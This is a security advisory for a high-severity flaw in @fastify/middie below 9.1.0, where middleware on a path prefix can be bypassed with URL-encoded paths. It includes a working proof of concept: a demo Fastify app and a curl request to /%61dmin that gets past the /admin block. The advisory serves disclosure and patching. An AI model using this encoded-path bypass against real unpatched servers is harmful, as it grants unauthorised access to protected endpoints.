Improper Handling of URL Encoding (Hex Encoding) Affecting @fastify/middie package, versions <9.1.0


Severity: high (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.11% (30th percentile)

  • Snyk ID: SNYK-JS-FASTIFYMIDDIE-15038725
  • published: 20 Jan 2026
  • disclosed: 19 Jan 2026
  • credit: Harsh Jaiswal

Introduced: 19 Jan 2026

CVE-2026-22031
CWE-177

How to fix?

Upgrade @fastify/middie to version 9.1.0 or higher.

Overview

@fastify/middie is a middleware engine for Fastify.

Affected versions of this package are vulnerable to Improper Handling of URL Encoding (Hex Encoding) where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). An attacker can gain unauthorized access to protected endpoints by sending such requests.

PoC

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register middie for Express-style middleware support
  await fastify.register(require('@fastify/middie'));

  // Middleware to block the /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });

  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });

  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });

  // Start server
  try {
    await fastify.listen({ port: 3008 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}

start();

Step 2: Execute the attack.

Normal Request (Blocked):

curl http://localhost:3008/admin
# Output: Forbidden: Access to /admin is blocked

Bypass Request (Successful):

curl http://localhost:3008/%61dmin
# Output: {"message":"Admin panel"}
